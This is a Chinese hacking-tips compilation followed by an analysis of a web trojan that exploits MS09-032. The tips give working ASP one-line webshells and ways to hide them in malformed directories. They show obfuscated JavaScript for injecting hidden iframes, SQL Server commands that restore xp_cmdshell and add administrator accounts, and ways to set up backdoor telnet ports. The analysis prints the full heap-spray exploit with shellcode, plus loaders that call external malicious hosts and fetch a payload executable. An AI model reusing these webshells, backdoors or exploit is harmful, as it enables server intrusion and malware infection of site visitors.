 ctrlakeymap = yes|no 设定 ALT 键的映射
 timeout = hh:mm:ss 设定空闲会话超时值
 timeoutactive = yes|no 启用空闲会话。
 maxfail = attempts 设定断开前失败的登录企图数。
 maxconn = connections设定最大连接数。
 port = number设定 telnet 端口。
 sec = [+/-]NTLM [+/-]passwd
设定身份验证机构
 fname = file 指定审计文件名。
 fsize = size 指定审计文件的最大尺寸(MB)。
 mode = console|stream指定操作模式。
 auditlocation = eventlog|file|both
指定记录地点
 audit = [+/-]user [+/-]fail [+/-]admin

49、例如:在IE上访问:
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
hack.txt里面的代码是：
<body> <META HTTP-EQUIV=”Refresh” CONTENT=”5;URL=http://www.hack520.org/”>
把这个hack.txt发到你空间就可以了！
这个可以利用来做网马哦！

50、autorun的病毒可以通过手动限制！
1，养成好习惯，插入U盘或移动硬盘，都要按住shift让其禁止自动运行！
2，打开盘符用右键打开！切忌双击盘符～
3，可以利用rar软件查看根目录下autorun病毒并删除之！他可以处理一些连右键都无法打开的分区！

51、log备份时的一句话木马：
a).<%%25Execute(request(“go”))%%25>
b).<%Execute(request(“go”))%>
c).%><%execute request(“go”)%><%
d).<script language=VBScript runat=server>execute request(“sb”)</Script>
e).<%25Execute(request(“l”))%25>
f).<%if request(“cmd”)<>”" then execute request(“pass”)%>

52、at “12:17″ /interactive cmd
执行后可以用AT命令查看新加的任务
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。

53、隐藏ASP后门的两种方法
1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：<!–#include file=”12.jpg”–>
新建12.jpg文件内容：<%execute(request(“l”))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt

54、attrib /d /s c:\windows +h +s，后windows目录变为隐藏＋系统，隐藏属性为灰不可更改，windows目录下面的文件和目录并没有继承属性，原来是什么样还是什么样。
然后在利用attrib /d /s c:\windows -h -s，windows目录可以显示，隐藏属性可以再次选中。

55、JS隐蔽挂马
1.
var tr4c3=”<iframe src=ht”;
tr4c3 = tr4c3+”tp:/”;
tr4c3 = tr4c3+”/ww”;
tr4c3 = tr4c3+”w.tr4″;
tr4c3 = tr4c3+”c3.com/inc/m”;
tr4c3 = tr4c3+”m.htm style=”display:none”></i”;
tr4c3 =tr4c3+”frame>’”;
document.write(tr4c3);
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些，混淆度增加。

2.
转换进制，然后用EVAL执行。如
eval(“\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73″);
不过这个有点显眼。
3.
document.write (‘<iframe src=http://www.tr4c3.com/inc/mm.htm style=”display:none”></iframe>’);
最后一点，别忘了把文件的时间也修改下。

56.3389终端入侵常用DOS命令
taskkill  taskkill /PID 1248 /t

tasklist  查进程

cacls “C:\Program Files\ewido anti-spyware 4.0\guard.exe” /d:everyone  改、降低某文件权限
iisreset /reboot
tsshutdn /reboot /delay:1    重起服务器

logoff 12  要使用会话 ID（例如，会话 12）从会话中注销用户，

query user  查看当前终端用户在线情况

要显示有关所有会话使用的进程的信息，请键入：query process *

要显示有关会话 ID 2 使用的进程的信息，请键入：query process /ID:2

要显示有关服务器 SERVER2 上所有活动会话的信息，请键入：query session /server:SERVER2

要显示有关当前会话 MODEM02 的信息，请键入：query session MODEM02

命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启

命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统

命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。

命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机

56、在地址栏或按Ctrl+O，输入：
javascript:s=document.documentElement.outerHTML;document.write(‘<body></body>’);document.body.innerText=s;

源代码就出来了。不论加密如何复杂，最终都要还原成浏览器可以解析的html代码，而documentElement.outerHTML正是最终的结果。

57、net user的时候，是不能显示加$的用户，但是如果不处理的话，
用net localgroup administrators是可以看到管理组下，加了$的用户的。

58、 sa弱口令相关命令

一.更改sa口令方法：
用sql综合利用工具连接后，执行命令：
exec sp_password NULL,’20001001′,’sa’
(提示：慎用!)

二.简单修补sa弱口令.

方法1:查询分离器连接后执行：
if exists (select * from
dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]‘) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

exec sp_dropextendedproc N’[dbo].[xp_cmdshell]‘

GO

然后按F5键命令执行完毕

方法2:查询分离器连接后
第一步执行：use master
第二步执行：sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕

三.常见情况恢复执行xp_cmdshell.

1  未能找到存储过程’master..xpcmdshell’.
恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

2  无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc “xp_cmdshell”
第二步执行：sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3  无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators  用户名 /add’

xp或2003server系统:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 用户名 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add’

59、开23端口telnet的话，太危险了。
大家都可以扫描到。就不是个人的后门了。。
这里很简单只需要一句命令：
tlntadmn config port=1001
这句命令的意思是把telnet23端口改为1001
大家可以自己更改在1025以内的端口。。可以欺骗性的改25。。呵呵

　　前两天有客户打来电话说他们的网站打不开了．或者说打开很慢。一查才知原来我们电信的一台服务器被挂马了。具体情况不多说了，主要来分析一下这个网页木马。

　　这是一个SQL数据库的挂马，打开MSSQL，发现多张表里的多个字段被插入了一段Script脚本，指向一个JS文件z.js，具体的地址我忘了。首先下载z.js，打开，发现代码如下：

document.writeln(” <base onmouseover=\”window.status=\’完毕                                                  \’;return true\”&gt;”);
document.writeln(” <SCRIPT LANGUAGE=\”JavaScript\”> “);
document.writeln(” <!– Hide “);
document.writeln(“function killErrors() { “);
document.writeln(“return true; “);
document.writeln(“} “);
document.writeln(“window.onerror = killErrors; “);
document.writeln(“\/\/ –> “);
document.writeln(” <\/SCRIPT>”);
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1a01ab2=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = “Cookie1a01ab2=hhhh;expires=”+ Then.toGMTString()
document.writeln(” <IFRaME src=\”http://ddsshjhaiiwiieieie2222.cn/aa/a3a.htm\” width=1 height=1> <\/IFRAME>”);
}
}Get();

发现有个Iframe标签，指向http://ddsshjhaiiwiieieie2222.cn/aa/a3a.htm。下载这个a2a.htm，注意不要在浏览里直接打开，会直接运行网马。打开下载下来的a3a.htm，发现代码如下：

<html>
<iframe src=”360.htm” width=111 height=0 border=0></iframe>
<br>
<br>
<br>
<br>
<br>
<script type=”text/javascript” src=”http://js.tongji.linezing.com/1137761/tongji.js”></script><noscript><a href=”http://www.linezing.com”><img src=”http://img.tongji.linezing.com/1137761/tongji.gif”/></a></noscript>

</script>
<script src=”http://s6.cnzz.com/stat.php?id=1408285&web_id=1408285″ language=”JavaScript” charset=”gb2312″></script>

下面的脚本都是些统计的东西，不用管。同样我们发现有个Iframe，指向360.htm，下载下来，打开：

<html>
<body>
<div id=”DivID”>
<script src=’go.jpg’></script>
<script src=’go1.jpg’></script>
</body>
</html>

看到了没？链接到了两张图片go.jpg和go1.jpg，同样下载下来。第一感觉就知道那肯定不是真正的图片，虽然后缀是JPG。想想看好了，如果最终只是链接到两张正常的图片，那他还挂什么网页木马？把.jpg改成.txt，打开，go.jpg代码如下：

var pingfan=unescape;
var s=pingfan(“%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8″);
s+=pingfan(“%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800″);
s+=pingfan(“%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010″);
s+=pingfan(“%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358″);
s+=pingfan(“%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05″);
s+=pingfan(“%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22″);
s+=pingfan(“%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003″);
s+=pingfan(“%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088″);
s+=pingfan(“%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0″);
s+=pingfan(“%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00″);
s+=pingfan(“%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190″);
s+=pingfan(“%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF”);
s+=pingfan(“%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57″);
s+=pingfan(“%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255″);
s+=pingfan(“%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF”);
s+=pingfan(“%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246″);
s+=pingfan(“%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF”);
s+=pingfan(“%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000″);
s+=pingfan(“%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF”);
s+=pingfan(“%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000″);
s+=pingfan(“%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA”);
s+=pingfan(“%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB”);
s+=pingfan(“%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867″);
s+=pingfan(“%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3″);
s+=pingfan(“%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001″);
s+=pingfan(“%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56″);
s+=pingfan(“%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7″);
s+=pingfan(“%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300″);
s+=pingfan(“%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E”);
s+=pingfan(“%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000″);
s+=pingfan(“%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4″);
s+=pingfan(“%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000″);
s+=pingfan(“%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9″);
s+=pingfan(“%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057″);
s+=pingfan(“%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850″);
s+=pingfan(“%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4″);
s+=pingfan(“%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B”);
s+=pingfan(“%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B”);
s+=pingfan(“%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC”);
s+=pingfan(“%u74C0%uC107%u0DCF%uF803%uF4EB%u3B36%u247C%u7528%u3EDF%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03″);
s+=pingfan(“%u8B3E%u8B04%uC503%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF”);
var u=pingfan(“%u7468%u7074%u2f3a%u6d2f%u6965%u7272%u3032%u632e%u6d6f%u732f%u6376%u6f68%u7473%u652e%u6578%u0000″);

go1.jpg代码如下：

var headersize=20;
bbbbs = ‘clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;
seee = ‘9090′;
saaa =’%u9′;
skkk =’090′;
ha=’%u’;
sxxx = saaa + skkk + ha + seee;
var dashell=s+u;
var omybro=unescape(sxxx);
var slackspace=headersize+dashell.length;
while(omybro.length bZmybr=omybro.substring(0,slackspace);
wjsccccccg=omybro.substring(0,omybro.length-slackspace);
while(wjsccccccg.length+slackspace<0×30000) wjsccccccg=wjsccccccg+wjsccccccg+bZmybr;
memory=new Array();
for(x=0;x<300;x++) memory[x]=wjsccccccg+dashell;
var myObject=document.createElement(‘object’);
DivID.appendChild(myObject);
myObject.width=’1′;
myObject.height=’1′;
myObject.data=’./logo.gif’;
myObject.classid=bbbbs;

搜索“0955AC62-BF2E-4CBA-A2B9-A63F772D46CF“得知这是微软最新的Microsoft DirectShow MPEG2TuneRequest组件栈溢出漏洞(MS09-032)，受影响系统：
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
DirectShow用于在Windows操作系统中处理流媒体。

DirectShow（msvidctl.dll）的BDATuningModelMPEG2TuneRequest视频组件中存在栈溢出漏洞。此漏洞可以通过IE浏览器远程利用，如果用户受骗访问了恶意网页并打开读取MPEG-2文件的话，就可能触发这个溢出，导致执行任意指令。目前这个漏洞正在被广泛的用于挂马攻击。

Microsoft已经为此发布了一个安全公告（MS09-032）以及相应补丁:
MS09-032：Cumulative Security Update of ActiveX Kill Bits (973346)
链接：http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx?pf=true

Ok，了解了情况后我们开始解密这个最新的网马，主要的代码是在go.jpg中，很明显，第一层是escape编码，我们替换掉多余的提取escape后的代码：

%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6%uFFFF%u54E8
%u0003%u8B00%uE8F8%u0038%u0000%u64E8%u0001%uE800%u0046%u0000%uF2E8%u0003%u8B00%uE8F8%u0022%u0000%u5BE8%u0001%uE800
%u0030%u0000%uA0E8%u0003%u8B00%uE8F8%u000C%u0000%u78E8%u0001%uE800%u001A%u0000%u58EB%u8B53%u53DC%u406A%u0068%u0010
%u5700%uC8E8%u0002%uE800%u00FA%u0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2%u0000%uC358
%uE857%u0453%u0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uFF05
%uC3E0%uACE9%u0004%u5B00%uEC81%u0114%u0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22
%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003
%uE800%u0072%u0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088
%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0
%u43C7%u012C%u0000%u5100%u5053%u5050%u5050%u5750%uE850%u033B%u0000%u19E8%u0000%u6400%u04A1%u0000%u8D00
%u60A0%uFFFF%uE8FF%u0339%u0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u4190
%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17%uFFFF%uE8C3%uFF11%uFFFF%u11B8%u0401%uC280%u000C%u04E8%uFFFF
%u33FF%u50C0%uE854%u0054%u0000%uE850%u028B%u0000%uD0FF%u8036%u243C%u7700%uE80A%u0241%u0000%uFF33%uFF57
%uE8D0%u01FB%u0000%uFF68%u0000%uFF00%uE8D0%uFED1%uFFFF%u5753%u3356%u50C0%uE854%u001E%u0000%uE850%u0255
%u0000%uD0FF%u8036%u243C%u7700%uE80A%u020B%u0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8%uFFFF
%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D%u0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246
%uF48B%u08B9%u0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB%u0000%uD0FF
%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF%u0000%uD0FF%uC483%u5F10%uB85E%u0001%u0000
%u68C3%u6E6F%u0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0%uFFFF
%uE6E8%uFFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64%u15EB%u448D%u0424%uE850%uFDE4%uFFFF%uE850%u0223%u0000
%uB9E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA
%uFFFF%uE850%u01F9%u0000%u8FE9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB
%u448D%u0424%uE850%uFD90%uFFFF%uE850%u01CF%u0000%u65E9%uFFFE%uE8FF%uFFE6%uFFFF%uC483%uC308%u7668%u7867
%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40%uFFFF%uE6E8%uFFFF%u83FF%u04C4%uE8C3
%u01AB%u0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197%u0000%uEC68%u0397%u500C%uB2E8%u0001
%u8300%u08C4%uE8C3%u0183%u0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F%u0000%uED68%uEF56
%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B%u0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7
%uFFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133%u0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300
%u08C4%uE8C3%u011F%u0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36%uFFFF%uAB68%u9B5E%u501E
%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7%uFFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3%u0000
%u7E68%uE2D8%u5073%uFEE8%u0000%u8300%u08C4%uE8C3%u00CF%u0000%u9E68%uBBF9%u5035%uEAE8%u0000%u8300%u08C4
%uE8C3%uFE92%uFFFF%u5768%uB5A0%u50BB%uD6E8%u0000%u8300%u08C4%uE8C3%uFE7E%uFFFF%u1A68%u1E7A%u5002%uC2E8%u0000
%u8300%u08C4%uE8C3%uFE6A%uFFFF%uE068%u305B%u5094%uAEE8%u0000%u8300%u08C4%uE8C3%uFE56%uFFFF%u9768%uE2C9
%u50A3%u9AE8%u0000%u8300%u08C4%uE8C3%uFE42%uFFFF%u6868%uC524%u50B3%u86E8%u0000%u8300%u08C4%uE8C3%u0057
%u0000%u7268%uB3FE%u5016%u72E8%u0000%u8300%u08C4%uE8C3%uFE44%uFFFF%u13EB%u656A%uE850%uFBE0%uFFFF%uE850
%uFEAB%uFFFF%uB5E9%uFFFC%uE8FF%uFFE8%uFFFF%uE8C3%uFDA9%uFFFF%u4F68%u4FEF%u5005%u3EE8%u0000%u8300%u08C4
%uE8C3%u000F%u0000%u8E68%u0E4E%u50EC%u2AE8%u0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B
%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B
%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC
%u74C0%uC107%u0DCF%uF803%uF4EB%u3B36%u247C%u7528%u3EDF%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03
%u8B3E%u8B04%uC503%u8936%u2444%u611C%uE8C3%uFB4F%uFFFF%u7468%u7074%u2f3a%u6d2f%u6965%u7272%u3032%u632e%u6d6f%u732f%u6376%u6f68%u7473%u652e%u6578%u0000

刚才说了，第一层是escape编码，所以我们先解码，如下图：

解码之后，发现还是乱七八糟的一堆，这是什么加密呢？看得出是些十六进制。把解出来的代码进行enumXOR，enumXOR的功能即对十六进制的数据进行枚举异或，如下图：

　　OK了，看到没有？！网马的最终地址就是：http://meirr20.com/svchost.exe。也不是很难吧，MPEG2漏洞网马解密完成。最后提醒一下，还没打补丁的赶紧打上，这个漏洞引发的网页挂马现在非常流行。